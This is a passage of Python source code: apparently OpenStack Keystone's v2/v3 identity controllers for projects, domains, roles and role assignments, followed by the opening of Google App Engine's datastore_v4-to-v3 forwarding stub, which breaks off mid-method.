tenant_refs = self.assignment_api.list_projects_in_domain(
CONF.identity.default_domain_id)
for tenant_ref in tenant_refs:
tenant_ref = self.filter_domain_id(tenant_ref)
params = {
'limit': context['query_string'].get('limit'),
'marker': context['query_string'].get('marker'),
}
return self._format_project_list(tenant_refs, **params)
@controller.v2_deprecated
def get_projects_for_token(self, context, **kw):
"""Get valid tenants for token based on token used to authenticate.
Pulls the token from the context, validates it and gets the valid
tenants for the user in the token.
Doesn't care about token scopedness.
"""
try:
token_ref = self.token_api.get_token(context['token_id'])
except exception.NotFound as e:
LOG.warning(_('Authentication failed: %s'), e)
raise exception.Unauthorized(e)
user_ref = token_ref['user']
tenant_refs = (
self.assignment_api.list_projects_for_user(user_ref['id']))
tenant_refs = [self.filter_domain_id(ref) for ref in tenant_refs
if ref['domain_id'] == CONF.identity.default_domain_id]
params = {
'limit': context['query_string'].get('limit'),
'marker': context['query_string'].get('marker'),
}
return self._format_project_list(tenant_refs, **params)
@controller.v2_deprecated
def get_project(self, context, tenant_id):
# TODO(termie): this stuff should probably be moved to middleware
self.assert_admin(context)
ref = self.assignment_api.get_project(tenant_id)
return {'tenant': self.filter_domain_id(ref)}
@controller.v2_deprecated
def get_project_by_name(self, context, tenant_name):
self.assert_admin(context)
ref = self.assignment_api.get_project_by_name(
tenant_name, CONF.identity.default_domain_id)
return {'tenant': self.filter_domain_id(ref)}
# CRUD Extension
@controller.v2_deprecated
def create_project(self, context, tenant):
tenant_ref = self._normalize_dict(tenant)
if 'name' not in tenant_ref or not tenant_ref['name']:
msg = _('Name field is required and cannot be empty')
raise exception.ValidationError(message=msg)
self.assert_admin(context)
tenant_ref['id'] = tenant_ref.get('id', uuid.uuid4().hex)
tenant = self.assignment_api.create_project(
tenant_ref['id'],
self._normalize_domain_id(context, tenant_ref))
return {'tenant': self.filter_domain_id(tenant)}
@controller.v2_deprecated
def update_project(self, context, tenant_id, tenant):
self.assert_admin(context)
# Remove domain_id if specified - a v2 api caller should not
# be specifying that
clean_tenant = tenant.copy()
clean_tenant.pop('domain_id', None)
tenant_ref = self.assignment_api.update_project(
tenant_id, clean_tenant)
return {'tenant': tenant_ref}
@controller.v2_deprecated
def delete_project(self, context, tenant_id):
self.assert_admin(context)
self.assignment_api.delete_project(tenant_id)
@controller.v2_deprecated
def get_project_users(self, context, tenant_id, **kw):
self.assert_admin(context)
user_refs = []
user_ids = self.assignment_api.list_user_ids_for_project(tenant_id)
for user_id in user_ids:
try:
user_ref = self.identity_api.get_user(user_id)
except exception.UserNotFound:
# Log that user is missing and continue on.
message = ("User %(user_id)s in project %(project_id)s "
"doesn't exist.")
LOG.debug(message,
{'user_id': user_id, 'project_id': tenant_id})
else:
user_refs.append(self.v3_to_v2_user(user_ref))
return {'users': user_refs}
def _format_project_list(self, tenant_refs, **kwargs):
marker = kwargs.get('marker')
first_index = 0
if marker is not None:
for (marker_index, tenant) in enumerate(tenant_refs):
if tenant['id'] == marker:
# we start pagination after the marker
first_index = marker_index + 1
break
else:
msg = _('Marker could not be found')
raise exception.ValidationError(message=msg)
limit = kwargs.get('limit')
last_index = None
if limit is not None:
try:
limit = int(limit)
if limit < 0:
raise AssertionError()
except (ValueError, AssertionError):
msg = _('Invalid limit value')
raise exception.ValidationError(message=msg)
last_index = first_index + limit
tenant_refs = tenant_refs[first_index:last_index]
for x in tenant_refs:
if 'enabled' not in x:
x['enabled'] = True
o = {'tenants': tenant_refs,
'tenants_links': []}
return o
@dependency.requires('assignment_api')
class Role(controller.V2Controller):
# COMPAT(essex-3)
@controller.v2_deprecated
def get_user_roles(self, context, user_id, tenant_id=None):
"""Get the roles for a user and tenant pair.
Since we're trying to ignore the idea of user-only roles we're
not implementing them in hopes that the idea will die off.
"""
self.assert_admin(context)
if tenant_id is None:
raise exception.NotImplemented(message='User roles not supported: '
'tenant ID required')
roles = self.assignment_api.get_roles_for_user_and_project(
user_id, tenant_id)
return {'roles': [self.assignment_api.get_role(x)
for x in roles]}
# CRUD extension
@controller.v2_deprecated
def get_role(self, context, role_id):
self.assert_admin(context)
return {'role': self.assignment_api.get_role(role_id)}
@controller.v2_deprecated
def create_role(self, context, role):
role = self._normalize_dict(role)
self.assert_admin(context)
if 'name' not in role or not role['name']:
msg = _('Name field is required and cannot be empty')
raise exception.ValidationError(message=msg)
role_id = uuid.uuid4().hex
role['id'] = role_id
role_ref = self.assignment_api.create_role(role_id, role)
return {'role': role_ref}
@controller.v2_deprecated
def delete_role(self, context, role_id):
self.assert_admin(context)
self.assignment_api.delete_role(role_id)
@controller.v2_deprecated
def get_roles(self, context):
self.assert_admin(context)
return {'roles': self.assignment_api.list_roles()}
@controller.v2_deprecated
def add_role_to_user(self, context, user_id, role_id, tenant_id=None):
"""Add a role to a user and tenant pair.
Since we're trying to ignore the idea of user-only roles we're
not implementing them in hopes that the idea will die off.
"""
self.assert_admin(context)
if tenant_id is None:
raise exception.NotImplemented(message='User roles not supported: '
'tenant_id required')
self.assignment_api.add_role_to_user_and_project(
user_id, tenant_id, role_id)
role_ref = self.assignment_api.get_role(role_id)
return {'role': role_ref}
@controller.v2_deprecated
def remove_role_from_user(self, context, user_id, role_id, tenant_id=None):
"""Remove a role from a user and tenant pair.
Since we're trying to ignore the idea of user-only roles we're
not implementing them in hopes that the idea will die off.
"""
self.assert_admin(context)
if tenant_id is None:
raise exception.NotImplemented(message='User roles not supported: '
'tenant_id required')
# This still has the weird legacy semantics that adding a role to
# a user also adds them to a tenant, so we must follow up on that
self.assignment_api.remove_role_from_user_and_project(
user_id, tenant_id, role_id)
# COMPAT(diablo): CRUD extension
@controller.v2_deprecated
def get_role_refs(self, context, user_id):
"""Ultimate hack to get around having to make role_refs first-class.
This will basically iterate over the various roles the user has in
all tenants the user is a member of and create fake role_refs where
the id encodes the user-tenant-role information so we can look
up the appropriate data when we need to delete them.
"""
self.assert_admin(context)
tenants = self.assignment_api.list_projects_for_user(user_id)
o = []
for tenant in tenants:
# As a v2 call, we should limit the response to those projects in
# the default domain.
if tenant['domain_id'] != CONF.identity.default_domain_id:
continue
role_ids = self.assignment_api.get_roles_for_user_and_project(
user_id, tenant['id'])
for role_id in role_ids:
ref = {'roleId': role_id,
'tenantId': tenant['id'],
'userId': user_id}
ref['id'] = urllib.parse.urlencode(ref)
o.append(ref)
return {'roles': o}
# COMPAT(diablo): CRUD extension
@controller.v2_deprecated
def create_role_ref(self, context, user_id, role):
"""This is actually used for adding a user to a tenant.
In the legacy data model adding a user to a tenant required setting
a role.
"""
self.assert_admin(context)
# TODO(termie): for now we're ignoring the actual role
tenant_id = role.get('tenantId')
role_id = role.get('roleId')
self.assignment_api.add_role_to_user_and_project(
user_id, tenant_id, role_id)
role_ref = self.assignment_api.get_role(role_id)
return {'role': role_ref}
# COMPAT(diablo): CRUD extension
@controller.v2_deprecated
def delete_role_ref(self, context, user_id, role_ref_id):
"""This is actually used for deleting a user from a tenant.
In the legacy data model removing a user from a tenant required
deleting a role.
To emulate this, we encode the tenant and role in the role_ref_id,
and if this happens to be the last role for the user-tenant pair,
we remove the user from the tenant.
"""
self.assert_admin(context)
# TODO(termie): for now we're ignoring the actual role
role_ref_ref = urllib.parse.parse_qs(role_ref_id)
tenant_id = role_ref_ref.get('tenantId')[0]
role_id = role_ref_ref.get('roleId')[0]
self.assignment_api.remove_role_from_user_and_project(
user_id, tenant_id, role_id)
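# A brief illustration of the role_ref id scheme used by get_role_refs and
# delete_role_ref above (hedged sketch with made-up ids, not part of the
# original module). The fake role_ref "id" is just the urlencoded
# user/tenant/role triple, so it can be decoded again with parse_qs:
#
#     >>> ref = {'roleId': 'r1', 'tenantId': 't1', 'userId': 'u1'}
#     >>> role_ref_id = urllib.parse.urlencode(ref)
#     >>> role_ref_id                          # key order may vary
#     'roleId=r1&tenantId=t1&userId=u1'
#     >>> urllib.parse.parse_qs(role_ref_id)['tenantId'][0]
#     't1'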
@dependency.requires('assignment_api')
class DomainV3(controller.V3Controller):
collection_name = 'domains'
member_name = 'domain'
def __init__(self):
super(DomainV3, self).__init__()
self.get_member_from_driver = self.assignment_api.get_domain
@controller.protected()
def create_domain(self, context, domain):
self._require_attribute(domain, 'name')
ref = self._assign_unique_id(self._normalize_dict(domain))
ref = self.assignment_api.create_domain(ref['id'], ref)
return DomainV3.wrap_member(context, ref)
@controller.filterprotected('enabled', 'name')
def list_domains(self, context, filters):
hints = DomainV3.build_driver_hints(context, filters)
refs = self.assignment_api.list_domains(hints=hints)
return DomainV3.wrap_collection(context, refs, hints=hints)
@controller.protected()
def get_domain(self, context, domain_id):
ref = self.assignment_api.get_domain(domain_id)
return DomainV3.wrap_member(context, ref)
@controller.protected()
def update_domain(self, context, domain_id, domain):
self._require_matching_id(domain_id, domain)
ref = self.assignment_api.update_domain(domain_id, domain)
return DomainV3.wrap_member(context, ref)
@controller.protected()
def delete_domain(self, context, domain_id):
return self.assignment_api.delete_domain(domain_id)
@dependency.requires('assignment_api')
class ProjectV3(controller.V3Controller):
collection_name = 'projects'
member_name = 'project'
def __init__(self):
super(ProjectV3, self).__init__()
self.get_member_from_driver = self.assignment_api.get_project
@controller.protected()
def create_project(self, context, project):
self._require_attribute(project, 'name')
ref = self._assign_unique_id(self._normalize_dict(project))
ref = self._normalize_domain_id(context, ref)
ref = self.assignment_api.create_project(ref['id'], ref)
return ProjectV3.wrap_member(context, ref)
@controller.filterprotected('domain_id', 'enabled', 'name')
def list_projects(self, context, filters):
hints = ProjectV3.build_driver_hints(context, filters)
refs = self.assignment_api.list_projects(hints=hints)
return ProjectV3.wrap_collection(context, refs, hints=hints)
@controller.filterprotected('enabled', 'name')
def list_user_projects(self, context, filters, user_id):
hints = ProjectV3.build_driver_hints(context, filters)
refs = self.assignment_api.list_projects_for_user(user_id,
hints=hints)
return ProjectV3.wrap_collection(context, refs, hints=hints)
@controller.protected()
def get_project(self, context, project_id):
ref = self.assignment_api.get_project(project_id)
return ProjectV3.wrap_member(context, ref)
@controller.protected()
def update_project(self, context, project_id, project):
self._require_matching_id(project_id, project)
self._require_matching_domain_id(
project_id, project, self.assignment_api.get_project)
ref = self.assignment_api.update_project(project_id, project)
return ProjectV3.wrap_member(context, ref)
@controller.protected()
def delete_project(self, context, project_id):
return self.assignment_api.delete_project(project_id)
@dependency.requires('assignment_api', 'identity_api')
class RoleV3(controller.V3Controller):
collection_name = 'roles'
member_name = 'role'
def __init__(self):
super(RoleV3, self).__init__()
self.get_member_from_driver = self.assignment_api.get_role
@controller.protected()
def create_role(self, context, role):
self._require_attribute(role, 'name')
ref = self._assign_unique_id(self._normalize_dict(role))
ref = self.assignment_api.create_role(ref['id'], ref)
return RoleV3.wrap_member(context, ref)
@controller.filterprotected('name')
def list_roles(self, context, filters):
hints = RoleV3.build_driver_hints(context, filters)
refs = self.assignment_api.list_roles(
hints=hints)
return RoleV3.wrap_collection(context, refs, hints=hints)
@controller.protected()
def get_role(self, context, role_id):
ref = self.assignment_api.get_role(role_id)
return RoleV3.wrap_member(context, ref)
@controller.protected()
def update_role(self, context, role_id, role):
self._require_matching_id(role_id, role)
ref = self.assignment_api.update_role(role_id, role)
return RoleV3.wrap_member(context, ref)
@controller.protected()
def delete_role(self, context, role_id):
self.assignment_api.delete_role(role_id)
def _require_domain_xor_project(self, domain_id, project_id):
if (domain_id and project_id) or (not domain_id and not project_id):
msg = _('Specify a domain or project, not both')
raise exception.ValidationError(msg)
def _require_user_xor_group(self, user_id, group_id):
if (user_id and group_id) or (not user_id and not group_id):
msg = _('Specify a user or group, not both')
raise exception.ValidationError(msg)
def _check_if_inherited(self, context):
return (CONF.os_inherit.enabled and
context['path'].startswith('/OS-INHERIT') and
context['path'].endswith('/inherited_to_projects'))
def _check_grant_protection(self, context, protection, role_id=None,
user_id=None, group_id=None,
domain_id=None, project_id=None):
"""Check protection for role grant APIs.
The policy rule might want to inspect attributes of any of the entities
involved in the grant. So we get these and pass them to the
check_protection() handler in the controller.
"""
ref = {}
if role_id:
ref['role'] = self.assignment_api.get_role(role_id)
if user_id:
ref['user'] = self.identity_api.get_user(user_id)
else:
ref['group'] = self.identity_api.get_group(group_id)
if domain_id:
ref['domain'] = self.assignment_api.get_domain(domain_id)
else:
ref['project'] = self.assignment_api.get_project(project_id)
self.check_protection(context, protection, ref)
@controller.protected(callback=_check_grant_protection)
def create_grant(self, context, role_id, user_id=None,
group_id=None, domain_id=None, project_id=None):
"""Grants a role to a user or group on either a domain or project."""
self._require_domain_xor_project(domain_id, project_id)
self._require_user_xor_group(user_id, group_id)
self.assignment_api.create_grant(
role_id, user_id, group_id, domain_id, project_id,
self._check_if_inherited(context))
@controller.protected(callback=_check_grant_protection)
def list_grants(self, context, user_id=None,
group_id=None, domain_id=None, project_id=None):
"""Lists roles granted to user/group on either a domain or project."""
self._require_domain_xor_project(domain_id, project_id)
self._require_user_xor_group(user_id, group_id)
refs = self.assignment_api.list_grants(
user_id, group_id, domain_id, project_id,
self._check_if_inherited(context))
return RoleV3.wrap_collection(context, refs)
@controller.protected(callback=_check_grant_protection)
def check_grant(self, context, role_id, user_id=None,
group_id=None, domain_id=None, project_id=None):
"""Checks if a role has been granted on either a domain or project."""
self._require_domain_xor_project(domain_id, project_id)
self._require_user_xor_group(user_id, group_id)
self.assignment_api.get_grant(
role_id, user_id, group_id, domain_id, project_id,
self._check_if_inherited(context))
@controller.protected(callback=_check_grant_protection)
def revoke_grant(self, context, role_id, user_id=None,
group_id=None, domain_id=None, project_id=None):
"""Revokes a role from user/group on either a domain or project."""
self._require_domain_xor_project(domain_id, project_id)
self._require_user_xor_group(user_id, group_id)
self.assignment_api.delete_grant(
role_id, user_id, group_id, domain_id, project_id,
self._check_if_inherited(context))
@dependency.requires('assignment_api', 'identity_api')
class RoleAssignmentV3(controller.V3Controller):
# TODO(henry-nash): The current implementation does not provide a full
# first class entity for role-assignment. There is no role_assignment_id
# and only the list_role_assignment call is supported. Further, since it
# is not a first class entity, the links for the individual entities
# reference the individual role grant APIs.
collection_name = 'role_assignments'
member_name = 'role_assignment'
@classmethod
def wrap_member(cls, context, ref):
# NOTE(henry-nash): Since we are not yet a true collection, we override
        # the wrapper, as we have already included the links in the entities
pass
def _format_entity(self, context, entity):
"""Format an assignment entity for API response.
The driver layer returns entities as dicts containing the ids of the
actor (e.g. user or group), target (e.g. domain or project) and role.
If it is an inherited role, then this is also indicated. Examples:
        {'user_id': user_id,
         'project_id': project_id,
         'role_id': role_id}
or, for an inherited role:
{'user_id': user_id,
'domain_id': domain_id,
'role_id': role_id,
'inherited_to_projects': true}
This function maps this into the format to be returned via the API,
e.g. for the second example above:
        {
            'user': {'id': user_id},
            'scope': {
                'domain': {'id': domain_id},
                'OS-INHERIT:inherited_to': 'projects'
            },
            'role': {'id': role_id},
            'links': {
                'assignment': '/domains/domain_id/users/user_id/roles/'
                              'role_id/inherited_to_projects'
            }
        }
"""
formatted_entity = {}
suffix = ""
if 'user_id' in entity:
formatted_entity['user'] = {'id': entity['user_id']}
actor_link = 'users/%s' % entity['user_id']
if 'group_id' in entity:
formatted_entity['group'] = {'id': entity['group_id']}
actor_link = 'groups/%s' % entity['group_id']
if 'role_id' in entity:
formatted_entity['role'] = {'id': entity['role_id']}
if 'project_id' in entity:
formatted_entity['scope'] = (
{'project': {'id': entity['project_id']}})
target_link = '/projects/%s' % entity['project_id']
if 'domain_id' in entity:
formatted_entity['scope'] = (
{'domain': {'id': entity['domain_id']}})
if 'inherited_to_projects' in entity:
formatted_entity['scope']['OS-INHERIT:inherited_to'] = (
'projects')
target_link = '/OS-INHERIT/domains/%s' % entity['domain_id']
suffix = '/inherited_to_projects'
else:
target_link = '/domains/%s' % entity['domain_id']
formatted_entity.setdefault('links', {})
path = '%(target)s/%(actor)s/roles/%(role)s%(suffix)s' % {
'target': target_link,
'actor': actor_link,
'role': entity['role_id'],
'suffix': suffix}
formatted_entity['links']['assignment'] = self.base_url(context, path)
return formatted_entity
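    # A hedged example of the mapping performed by _format_entity (illustrative
    # ids only, not part of the original module): a driver-level assignment like
    #
    #     {'user_id': 'u1', 'project_id': 'p1', 'role_id': 'r1'}
    #
    # comes back roughly as
    #
    #     {'user': {'id': 'u1'},
    #      'role': {'id': 'r1'},
    #      'scope': {'project': {'id': 'p1'}},
    #      'links': {'assignment': '<base_url>/projects/p1/users/u1/roles/r1'}}
    #
    # where <base_url> is whatever self.base_url(context, path) prepends.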
def _expand_indirect_assignments(self, context, refs):
"""Processes entity list into all-direct assignments.
For any group role assignments in the list, create a role assignment
entity for each member of that group, and then remove the group
assignment entity itself from the list.
If the OS-INHERIT extension is enabled, then honor any inherited
roles on the domain by creating the equivalent on all projects
owned by the domain.
For any new entity created by virtue of group membership, add in an
additional link to that membership.
"""
def _get_group_members(ref):
"""Get a list of group members.
Get the list of group members. If this fails with
GroupNotFound, then log this as a warning, but allow
overall processing to continue.
"""
try:
members = self.identity_api.list_users_in_group(
ref['group']['id'])
except exception.GroupNotFound:
members = []
# The group is missing, which should not happen since
# group deletion should remove any related assignments, so
# log a warning
                if 'domain' in ref['scope']:
                    target = 'Domain: %s' % ref['scope']['domain'].get('id')
                elif 'project' in ref['scope']:
                    target = 'Project: %s' % ref['scope']['project'].get('id')
                else:
                    # Should always be a domain or project, but since to get
                    # here things have gone astray, let's be cautious.
                    target = 'Unknown'
                LOG.warning(
                    _('Group %(group)s not found for role-assignment - '
                      '%(target)s with Role: %(role)s'), {
                          'group': ref['group']['id'], 'target': target,
                          'role': ref['role'].get('id')})
return members
def _build_user_assignment_equivalent_of_group(
user, group_id, template):
"""Create a user assignment equivalent to the group one.
The template has had the 'group' entity removed, so
substitute a 'user' one. The 'assignment' link stays as it is,
referring to the group assignment that led to this role.
A 'membership' link is added that refers to this particular
user's membership of this group.
"""
user_entry = copy.deepcopy(template)
user_entry['user'] = {'id': user['id']}
user_entry['links']['membership'] = (
self.base_url(context, '/groups/%s/users/%s' %
(group_id, user['id'])))
return user_entry
def _build_project_equivalent_of_user_domain_role(
project_id, domain_id, template):
"""Create a user project assignment equivalent to the domain one.
The template has had the 'domain' entity removed, so
substitute a 'project' one, modifying the 'assignment' link
to match.
"""
project_entry = copy.deepcopy(template)
project_entry['scope']['project'] = {'id': project_id}
project_entry['links']['assignment'] = (
self.base_url(
context,
'/OS-INHERIT/domains/%s/users/%s/roles/%s'
'/inherited_to_projects' % (
domain_id, project_entry['user']['id'],
project_entry['role']['id'])))
return project_entry
def _build_project_equivalent_of_group_domain_role(
user_id, group_id, project_id, domain_id, template):
"""Create a user project equivalent to the domain group one.
The template has had the 'domain' and 'group' entities removed, so
substitute a 'user-project' one, modifying the 'assignment' link
to match.
"""
project_entry = copy.deepcopy(template)
project_entry['user'] = {'id': user_id}
project_entry['scope']['project'] = {'id': project_id}
project_entry['links']['assignment'] = (
self.base_url(context,
'/OS-INHERIT/domains/%s/groups/%s/roles/%s'
'/inherited_to_projects' % (
domain_id, group_id,
project_entry['role']['id'])))
project_entry['links']['membership'] = (
self.base_url(context, '/groups/%s/users/%s' %
(group_id, user_id)))
return project_entry
# Scan the list of entities for any assignments that need to be
# expanded.
#
        # If the OS-INHERIT extension is enabled, the refs lists may
# contain roles to be inherited from domain to project, so expand
# these as well into project equivalents
#
# For any regular group entries, expand these into user entries based
# on membership of that group.
#
# Due to the potentially large expansions, rather than modify the
# list we are enumerating, we build a new one as we go.
#
new_refs = []
for r in refs:
if 'OS-INHERIT:inherited_to' in r['scope']:
# It's an inherited domain role - so get the list of projects
# owned by this domain. A domain scope is guaranteed since we
# checked this when we built the refs list
project_ids = (
[x['id'] for x in
self.assignment_api.list_projects_in_domain(
r['scope']['domain']['id'])])
base_entry = copy.deepcopy(r)
domain_id = base_entry['scope']['domain']['id']
base_entry['scope'].pop('domain')
# For each project, create an equivalent role assignment
for p in project_ids:
# If it's a group assignment, then create equivalent user
# roles based on membership of the group
if 'group' in base_entry:
members = _get_group_members(base_entry)
sub_entry = copy.deepcopy(base_entry)
group_id = sub_entry['group']['id']
sub_entry.pop('group')
for m in members:
new_entry = (
_build_project_equivalent_of_group_domain_role(
m['id'], group_id, p,
domain_id, sub_entry))
new_refs.append(new_entry)
else:
new_entry = (
_build_project_equivalent_of_user_domain_role(
p, domain_id, base_entry))
new_refs.append(new_entry)
elif 'group' in r:
# It's a non-inherited group role assignment, so get the list
# of members.
members = _get_group_members(r)
# Now replace that group role assignment entry with an
# equivalent user role assignment for each of the group members
base_entry = copy.deepcopy(r)
group_id = base_entry['group']['id']
base_entry.pop('group')
for m in members:
user_entry = _build_user_assignment_equivalent_of_group(
m, group_id, base_entry)
new_refs.append(user_entry)
else:
new_refs.append(r)
return new_refs
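    # A hedged sketch of the expansion above (made-up ids, not part of the
    # original module): a single group assignment such as
    #
    #     {'group': {'id': 'g1'}, 'role': {'id': 'r1'},
    #      'scope': {'project': {'id': 'p1'}},
    #      'links': {'assignment': '<assignment-url>'}}
    #
    # with users u1 and u2 in group g1 is replaced by two user entries, each
    # keeping the original 'assignment' link and gaining a 'membership' link:
    #
    #     {'user': {'id': 'u1'}, 'role': {'id': 'r1'},
    #      'scope': {'project': {'id': 'p1'}},
    #      'links': {'assignment': '<assignment-url>',
    #                'membership': '<base_url>/groups/g1/users/u1'}}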
def _query_filter_is_true(self, filter_value):
"""Determine if bool query param is 'True'.
We treat this the same way as we do for policy
enforcement:
{bool_param}=0 is treated as False
Any other value is considered to be equivalent to
True, including the absence of a value
"""
if (isinstance(filter_value, six.string_types) and
filter_value == '0'):
val = False
else:
val = True
return val
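    # Hedged examples of the rule above (not part of the original module):
    #     ?effective=0     -> False
    #     ?effective=1     -> True
    #     ?effective=true  -> True
    #     ?effective       -> True (a missing value still counts as True)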
def _filter_inherited(self, entry):
if ('inherited_to_projects' in entry and
not CONF.os_inherit.enabled):
return False
else:
return True
@controller.filterprotected('group.id', 'role.id',
'scope.domain.id', 'scope.project.id',
'scope.OS-INHERIT:inherited_to', 'user.id')
def list_role_assignments(self, context, filters):
# TODO(henry-nash): This implementation uses the standard filtering
# in the V3.wrap_collection. Given the large number of individual
# assignments, this is pretty inefficient. An alternative would be
# to pass the filters into the driver call, so that the list size is
        # kept to a minimum.
hints = self.build_driver_hints(context, filters)
refs = self.assignment_api.list_role_assignments()
formatted_refs = (
[self._format_entity(context, x) for x in refs
if self._filter_inherited(x)])
if ('effective' in context['query_string'] and
self._query_filter_is_true(
context['query_string']['effective'])):
formatted_refs = self._expand_indirect_assignments(context,
formatted_refs)
return self.wrap_collection(context, formatted_refs, hints=hints)
@controller.protected()
def get_role_assignment(self, context):
raise exception.NotImplemented()
@controller.protected()
def update_role_assignment(self, context):
raise exception.NotImplemented()
@controller.protected()
def delete_role_assignment(self, context):
raise exception.NotImplemented()
|
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Implementation of the datastore_v4 API that forwards to the v3 service."""
from google.appengine.datastore import entity_pb
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub
from google.appengine.api import apiproxy_stub_map
from google.appengine.datastore import datastore_pb
from google.appengine.datastore import datastore_pbs
from google.appengine.datastore import datastore_query
from google.appengine.datastore import datastore_stub_util
from google.appengine.datastore import datastore_v4_pb
from google.appengine.datastore import datastore_v4_validator
from google.appengine.runtime import apiproxy_errors
SERVICE_NAME = 'datastore_v4'
V3_SERVICE_NAME = 'datastore_v3'
class DatastoreV4Stub(apiproxy_stub.APIProxyStub):
"""Implementation of the datastore_v4 API that forwards to the v3 service."""
THREADSAFE = False
def __init__(self, app_id):
apiproxy_stub.APIProxyStub.__init__(self, SERVICE_NAME)
self.__app_id = app_id
self.__entity_converter = datastore_pbs.get_entity_converter()
self.__service_converter = datastore_stub_util.get_service_converter()
self.__service_validator = datastore_v4_validator.get_service_validator()
def _Dynamic_BeginTransaction(self, req, resp):
try:
self.__service_validator.validate_begin_transaction_req(req)
v3_req = self.__service_converter.v4_to_v3_begin_transaction_req(
self.__app_id, req)
v3_resp = datastore_pb.Transaction()
self.__make_v3_call('BeginTransaction', v3_req, v3_resp)
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
except datastore_v4_validator.ValidationError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
try:
v4_resp = self.__service_converter.v3_to_v4_begin_transaction_resp(
v3_resp)
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.INTERNAL_ERROR, str(e))
resp.CopyFrom(v4_resp)
def _Dynamic_Rollback(self, req, unused_resp):
try:
self.__service_validator.validate_rollback_req(req)
v3_req = self.__service_converter.v4_rollback_req_to_v3_txn(req)
self.__make_v3_call('Rollback', v3_req, api_base_pb.VoidProto())
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
except datastore_v4_validator.ValidationError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
def _Dynamic_Commit(self, req, resp):
try:
self.__service_validator.validate_commit_req(req)
if req.has_transaction():
resp.mutable_deprecated_mutation_result()
resp.mutable_deprecated_mutation_result().CopyFrom(
self.__apply_v4_deprecated_mutation(req.deprecated_mutation(),
req.transaction()))
v3_req = self.__service_converter.v4_commit_req_to_v3_txn(req)
v3_resp = datastore_pb.CommitResponse()
self.__make_v3_call('Commit', v3_req, v3_resp)
total_index_updates = (
resp.mutable_deprecated_mutation_result().index_updates()
+ v3_resp.cost().index_writes())
resp.mutable_deprecated_mutation_result().set_index_updates(
total_index_updates)
else:
resp.mutable_deprecated_mutation_result().CopyFrom(
self.__apply_v4_deprecated_mutation(req.deprecated_mutation(),
None))
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
except datastore_v4_validator.ValidationError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
def _GetQueryCompositeFilter(self, filters, operator):
"""Wraps the filters in a datastore_query.CompositeFilter if length > 1."""
if not filters:
return None
elif len(filters) == 1:
return filters[0]
else:
return datastore_query.CompositeFilter(operator, filters)
def _GetV4PbCompositeFilter(self, filter_pbs, operator_pb):
"""Wraps the filters in a datastore_v4_pb.CompositeFilter if length > 1."""
if not filter_pbs:
return None
elif len(filter_pbs) == 1:
return filter_pbs[0]
else:
res_filter_pb = datastore_v4_pb.Filter()
composite_filter_pb = res_filter_pb.mutable_composite_filter()
composite_filter_pb.set_operator(operator_pb)
composite_filter_pb.filter_list().extend(filter_pbs)
return res_filter_pb
def _GetFilterPbList(self, filter_pb):
if filter_pb.has_composite_filter():
composite_filter = filter_pb.composite_filter()
assert composite_filter.operator() == datastore_v4_pb.CompositeFilter.AND
return composite_filter.filter_list()
else:
return [filter_pb]
def _ConvertGeospatialFilterOrNone(self, filter_pb):
"""Converts geo-spatial filters to filter predicates."""
if filter_pb.has_bounding_circle_filter():
return (datastore_query._BoundingCircleFilter._from_v4_pb(
filter_pb.bounding_circle_filter()))
elif filter_pb.has_bounding_box_filter():
return (datastore_query._BoundingBoxFilter._from_v4_pb(
filter_pb.bounding_box_filter()))
else:
return None
def _SplitGeospatialFilters(self, req):
"""Extracts, converts and removes geo-filters from a request.
Args:
req: a datastore_v4_pb.RunQueryRequest
Returns:
a pair (new_req, filter_predicate) where new_req is req with unsupported
filters removed and filter_predicate is a datastore_query.FilterPredicate
with the unsupported filters. filter_predicate is None if no unsupported
filters were removed.
"""
assert datastore_v4_pb.CompositeFilter._Operator_NAMES.values() == ['AND']
filter_predicate = None
new_req = datastore_v4_pb.RunQueryRequest()
new_req.CopyFrom(req)
query = new_req.mutable_query()
sub_filter_pbs = []
sub_filter_predicates = []
for filter_pb in self._GetFilterPbList(req.query().filter()):
sub_filter_predicate = self._ConvertGeospatialFilterOrNone(filter_pb)
if sub_filter_predicate is None:
sub_filter_pbs.append(filter_pb)
else:
sub_filter_predicates.append(sub_filter_predicate)
op_pb = datastore_v4_pb.CompositeFilter.AND
op = datastore_query.CompositeFilter.AND
filter_pb = self._GetV4PbCompositeFilter(sub_filter_pbs, op_pb)
filter_predicate = self._GetQueryCompositeFilter(sub_filter_predicates, op)
if filter_pb is None:
query.clear_filter()
else:
query.mutable_filter().CopyFrom(filter_pb)
return (new_req, filter_predicate)
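  # A hedged sketch of how _SplitGeospatialFilters is used (not part of the
  # original module): given a v4 query whose filter is
  # AND(bounding_box_filter, property_filter), the call
  #
  #     new_req, filter_predicate = self._SplitGeospatialFilters(req)
  #
  # leaves only the property_filter in new_req.query().filter(), while
  # filter_predicate wraps the bounding-box filter so _Dynamic_RunQuery below
  # can apply it in-process via the v3 stub.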
def _Dynamic_RunQuery(self, req, resp):
try:
self.__normalize_v4_run_query_request(req)
self.__service_validator.validate_run_query_req(req)
v3_stub = apiproxy_stub_map.apiproxy.GetStub(V3_SERVICE_NAME)
new_req, filter_predicate = self._SplitGeospatialFilters(req)
if (issubclass(v3_stub.__class__, datastore_stub_util.BaseDatastore)
and filter_predicate is not None):
v3_req = self.__service_converter.v4_run_query_req_to_v3_query(new_req)
v3_resp = datastore_pb.QueryResult()
v3_stub._Dynamic_RunQuery(v3_req, v3_resp, filter_predicate)
else:
